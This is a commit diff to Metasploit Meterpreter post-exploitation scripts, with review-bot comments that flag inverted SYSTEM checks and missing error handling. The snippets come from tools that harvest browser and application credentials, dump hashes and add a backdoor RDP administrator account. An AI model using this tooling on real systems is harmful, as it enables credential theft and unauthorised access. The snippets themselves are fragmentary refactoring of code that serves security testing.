
Update Meterpreter scripts to use is_system? and make the getgui script language-independent by identifying the local groups through their well-known SIDs

git-svn-id: file:///home/svn/framework3/trunk@11998 4d416f70-5f16-0410-b530-b9f4589650
Carlos Perez 8 years ago
parent
commit
89795f1784

+ 4
- 1
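--- a/scripts/meterpreter/enum_chrome.rb
+++ b/scripts/meterpreter/enum_chrome.rb
@@ -208,7 +208,10 @@ elsif os =~ /(2000|NET|XP)/
 end
 
 usernames = []
-if (uid = client.sys.config.getuid) == "NT AUTHORITY\\SYSTEM"
+
+uid = client.sys.config.getuid
+
+if is_system?
 	print_status "running as SYSTEM, extracting user list..."
 	print_status "(decryption of passwords and credit card numbers will not be possible)"
 	client.fs.dir.foreach(@profiles_path) do |u|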

+ 1
- 1
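--- a/scripts/meterpreter/enum_firefox.rb
+++ b/scripts/meterpreter/enum_firefox.rb
@@ -252,7 +252,7 @@ end
 if client.platform =~ /win32|win64/
 	if frfxchk
 		user = @client.sys.config.getuid
-		if user != "NT AUTHORITY\\SYSTEM"
+		if is_system?
 			usrname = Rex::FileUtils.clean_path(@client.fs.file.expand_path("%USERNAME%"))
 			db_path = @client.fs.file.expand_path("%APPDATA%") + "\\Mozilla\\Firefox\\Profiles"
 			if kill_frfx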
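Review bot: The new `if is_system?` line inverts the test it replaces: the removed condition was `user != "NT AUTHORITY\\SYSTEM"`, so the `%USERNAME%`/`%APPDATA%` profile lookup that follows used to run only when the session was not SYSTEM, and now runs only when it is, where those variables presumably expand to the SYSTEM profile rather than a logged-on user's. It should read `unless is_system?` (or `if not is_system?`, as the winenum.rb change in this same commit does). The `user = @client.sys.config.getuid` assignment kept just above is no longer read within this hunk; drop it unless it is used further down. The enclosing `if client.platform` block continues past the end of the hunk.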

+ 1
- 1
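--- a/scripts/meterpreter/enum_powershell_env.rb
+++ b/scripts/meterpreter/enum_powershell_env.rb
@@ -33,7 +33,7 @@ def enum_users
 		profilepath = "\\My Documents\\WindowsPowerShell\\"
 	end
 
-	if user == "NT AUTHORITY\\SYSTEM"
+	if is_system?
 		print_status("Running as SYSTEM extracting user list..")
 		@client.fs.dir.foreach(path4users) do |u|
 			userinfo = {}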

+ 2
- 2
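--- a/scripts/meterpreter/enum_putty.rb
+++ b/scripts/meterpreter/enum_putty.rb
@@ -21,8 +21,8 @@ opts.parse(args) { |opt, idx, val|
 
 def hkcu_base
 	key_base = []
-	user = @client.sys.config.getuid
-	if user != "NT AUTHORITY\\SYSTEM"
+	
+	if is_system?
 		key_base << "HKCU"
 	else
 		key = "HKU\\"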
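Review bot: The replacement `if is_system?` in hkcu_base reverses the original `user != "NT AUTHORITY\\SYSTEM"` test, so `HKCU` is now chosen when the session is SYSTEM and the per-user `HKU\` path in the `else` branch when it is not, which is the opposite of what the removed code did. Change the line to `unless is_system?`. The added blank line just above it is a lone tab rather than an empty line; make it empty. The `else` branch of hkcu_base continues past the end of the hunk.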

+ 2
- 2
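--- a/scripts/meterpreter/enum_shares.rb
+++ b/scripts/meterpreter/enum_shares.rb
@@ -76,8 +76,8 @@ if client.platform =~ /win32|64/
 
 	# Enumerate shares being offered
 	enum_conf_shares()
-	user = client.sys.config.getuid
-	if user != "NT AUTHORITY\\SYSTEM"
+	
+	if is_system?
 		mount_history = enum_recent_mounts("HKEY_CURRENT_USER")
 		run_history = enum_run_unc("HKEY_CURRENT_USER")
 	else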
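Review bot: The new `if is_system?` inverts the removed `user != "NT AUTHORITY\\SYSTEM"` check, so the `HKEY_CURRENT_USER` branch (`enum_recent_mounts`/`enum_run_unc`) now runs as SYSTEM and whatever the `else` branch does runs for ordinary user sessions, the reverse of the original. It should be `unless is_system?`. The inserted blank line above it contains a stray tab; leave it empty instead. The `else` branch and the enclosing `if client.platform` block continue past the hunk.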

+ 2
- 2
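--- a/scripts/meterpreter/enum_vmware.rb
+++ b/scripts/meterpreter/enum_vmware.rb
@@ -101,8 +101,8 @@ def enum_viclient
 			end
 		end
 	end
-	user = @client.sys.config.getuid
-	if user != "NT AUTHORITY\\SYSTEM"
+	
+	if is_system?
 		recentconns = registry_getvaldata("HKCU\\Software\\VMware\\VMware Infrastructure Client\\Preferences","RecentConnections").split(",")
 		print_status("Recent VI Client Connections:")
 		recentconns.each do |c|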
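Review bot: The new `if is_system?` in enum_viclient is the negation of the condition it replaces (`user != "NT AUTHORITY\\SYSTEM"`), so the `HKCU\Software\VMware\...` lookup now executes only as SYSTEM, whose HKCU is presumably not the interactive user's hive. It should read `unless is_system?`. Separately, `registry_getvaldata(...)` on that line is called with `.split(",")` directly; if the value is absent it returns nil and this raises NoMethodError, which the original code also did not guard. The added blank line above it carries a trailing tab. The function continues past the end of the hunk.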

+ 2
- 2
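--- a/scripts/meterpreter/get_filezilla_creds.rb
+++ b/scripts/meterpreter/get_filezilla_creds.rb
@@ -115,7 +115,7 @@ end
 #Function to enumerate the users if running as SYSTEM
 def enum_users(os)
 	users = []
-	user = @client.sys.config.getuid
+	
 	path4users = ""
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
@@ -127,7 +127,7 @@ def enum_users(os)
 		path2purple = "\\Application Data\\"
 	end
 
-	if user == "NT AUTHORITY\\SYSTEM"
+	if is_system?
 		print_status("Running as SYSTEM extracting user list..")
 		@client.fs.dir.foreach(path4users) do |u|
 			userinfo = {}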
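Review bot: The line that replaces the removed `user = @client.sys.config.getuid` assignment in the first hunk is not empty but a single tab, leaving trailing whitespace inside enum_users; either delete the line outright or leave it genuinely blank. Since the `user` local no longer exists, any remaining reference to it in the part of enum_users that lies outside these two hunks would raise NameError at runtime, so it is worth a grep of the rest of the function before merging. The body of enum_users continues past the end of the second hunk.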

+ 2
- 2
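--- a/scripts/meterpreter/get_pidgin_creds.rb
+++ b/scripts/meterpreter/get_pidgin_creds.rb
@@ -145,7 +145,7 @@ end
 #Function to enumerate the users if running as SYSTEM
 def enum_users(os)
 	users = []
-	user = @client.sys.config.getuid
+	
 	path4users = ""
 	sysdrv = @client.fs.file.expand_path("%SystemDrive%")
 
@@ -157,7 +157,7 @@ def enum_users(os)
 		path2purple = "\\Application Data\\"
 	end
 
-	if user == "NT AUTHORITY\\SYSTEM"
+	if is_system?
 		print_status("Running as SYSTEM extracting user list..")
 		@client.fs.dir.foreach(path4users) do |u|
 			userinfo = {}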
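Review bot: As in get_filezilla_creds.rb, the line substituted for the removed `user = @client.sys.config.getuid` in the first hunk is a lone tab rather than an empty line; drop it or make it blank. With the `user` local gone, any reference to it elsewhere in enum_users (the function body continues outside both hunks) would now raise NameError, so check the rest of the function. No other behavioural concern with the `if is_system?` replacement in the second hunk, which keeps the original `==` sense.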

+ 7
- 42
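--- a/scripts/meterpreter/getgui.rb
+++ b/scripts/meterpreter/getgui.rb
@@ -21,7 +21,6 @@ logs = ::File.join(Msf::Config.log_directory,'scripts', 'getgui')
 @@exec_opts = Rex::Parser::Arguments.new(
 	"-h" => [ false, "Help menu." ],
 	"-e" => [ false, "Enable RDP only." ],
-	"-l" => [ true, "The language switch\n\t\tPossible Options: 'de_DE', 'en_EN' / default is: 'en_EN'" ],
 	"-p" => [ true,  "The Password of the user to add." ],
 	"-u" => [ true,  "The Username of the user to add." ],
 	"-f" => [ true,  "Forward RDP Connection." ]
@@ -35,23 +34,6 @@ def usage
 end
 
 
-def langdetect(lang)
-	if lang != nil
-		print_status("Language set by user to: '#{lang}'")
-	else
-		print_status("Language detection started")
-		lang = client.sys.config.sysinfo['System Language']
-		if lang != nil
-			print_status("\tLanguage detected: #{lang}")
-		else
-			print_error("\tLanguage detection failed, falling back to default 'en_EN'")
-			lang = "en_EN"
-		end
-	end
-	return lang
-rescue::Exception => e
-	print_status("The following Error was encountered: #{e.class} #{e}")
-end
 
 
 def enablerd()
@@ -100,26 +82,11 @@ end
 
 
 
-def addrdpusr(session, username, password, lang)
-	# Changing the group names depending on the selected language
-	case lang
-	when "en_EN"
-		rdu = "Remote Desktop Users"
-		admin = "Administrators"
-	when "en_US"
-		rdu = "Remote Desktop Users"
-		admin = "Administrators"
-	when "de_DE"
-		rdu = "Remotedesktopbenutzer"
-		admin = "Administratoren"
-	when "fr_FR"
-		rdu = "Utilisateurs du Bureau � distance"
-		admin = "Administrateurs"
-	else
-		print_error("Could not determine lenguage, defaulting to English!")
-		rdu = "Remote Desktop Users"
-		admin = "Administrators"
-	end
+def addrdpusr(session, username, password)
+		
+	rdu = resolve_sid("S-1-5-32-555")[:name]
+	admin = resolve_sid("S-1-5-32-544")[:name]
+
 
 	print_status "Setting user account for logon"
 	print_status "\tAdding User: #{username} with Password: #{password}"
@@ -159,8 +126,6 @@ frwrd = nil
 		pass = val
 	when "-h"
 		usage
-	when "-l"
-		lang = val
 	when "-f"
 		frwrd = true
 		lport = val
@@ -178,8 +143,8 @@ if client.platform =~ /win32|win64/
 				enabletssrv()
 			end
 			if usr and pass
-				lang = langdetect(lang)
-				addrdpusr(session, usr, pass)
+				
+				addrdpusr(session, usr, pass)
 			end
 			if frwrd == true
 				print_status("Starting the port forwarding at local port #{lport}")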
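Review bot: In the rewritten addrdpusr, `rdu = resolve_sid("S-1-5-32-555")[:name]` and the Administrators line below it have no failure path: the removed code always fell back to the English group names, whereas now a lookup that yields no name leaves `rdu`/`admin` nil and the group-membership commands further down the function (outside this hunk) would presumably run with an empty group name, or the script would raise if resolve_sid returns something without `[]`. I would check both results before continuing and abort with a clear message, as sketched below, and add a short comment explaining that the well-known SIDs are used so the names match the target's language. The exact shape resolve_sid returns on failure is not visible here, so confirm the nil check matches it. Two of the added blank lines (the one after the `def` line and the one before `addrdpusr(session, usr, pass)` in the last hunk) contain only tabs; make them empty. The body of addrdpusr continues past the end of the hunk.
```ruby
def addrdpusr(session, username, password)
	# Resolve the well-known local-group SIDs so the names match the target's language
	rdu   = resolve_sid("S-1-5-32-555")[:name]
	admin = resolve_sid("S-1-5-32-544")[:name]
	if rdu.nil? || admin.nil?
		print_error("Could not resolve the Remote Desktop Users or Administrators group name from its SID")
		return
	end
	# … unchanged: user creation and group membership …
```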

+ 1
- 1
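--- a/scripts/meterpreter/remotewinenum.rb
+++ b/scripts/meterpreter/remotewinenum.rb
@@ -171,7 +171,7 @@ if client.platform =~ /win32|win64/
 
 			# Making sure that is running as System a Username and Password for target machine must be provided
 
-			if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil
+			if is_system? && rusr == nil && rpass == nil
 
 				print_status("Stopped: Running as System and no user provided for connecting to target!!")
 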
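Review bot: The rewritten condition `is_system? && rusr == nil && rpass == nil` still stops only when both the user and the password are missing, so a SYSTEM session given `-u` without `-p` (or the reverse) passes the guard and continues with half a credential, which the comment above ("a Username and Password ... must be provided") suggests is not intended. If so, `if is_system? && (rusr.nil? || rpass.nil?)` expresses the stated rule, and `nil?` is preferred over `== nil` in Ruby either way; I am inferring intent from the comment, so confirm before changing the logic. The enclosing `if client.platform` block continues outside the hunk.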

+ 2
- 2
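--- a/scripts/meterpreter/winenum.rb
+++ b/scripts/meterpreter/winenum.rb
@@ -606,7 +606,7 @@ elsif trgtos =~ /(Windows 2008)/
 	list_exec(commands + win2k8cmd)
 	wmicexec(wmic)
 	findprogs()
-	if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+	if not is_system?
 		print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows 2008 if not System.")
 	else
 		gethash()
@@ -621,7 +621,7 @@ elsif trgtos =~ /Windows (Vista|7)/
 	end
 	wmicexec(wmic)
 	findprogs()
-	if (client.sys.config.getuid != "NT AUTHORITY\\SYSTEM")
+	if not is_system?
 		print_line("[-] Not currently running as SYSTEM, not able to dump hashes in Windows Vista or Windows 7 if not System.")
 	else
 		gethash()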
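Review bot: Both new `if not is_system?` lines keep the original `!=` sense, which is correct, but `if not ... else` is the form the Ruby style guide asks to write as `unless is_system?`; since each branch has an `else`, the tidier equivalent is to swap the branches, `if is_system? ... gethash() ... else ... print_line(...)`, avoiding both `not` and `unless/else`. Applying the same spelling here as in the other scripts in this commit (which use `if is_system?`/`unless is_system?`) would also keep the style uniform. Both `elsif trgtos` branches continue past the ends of their hunks.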
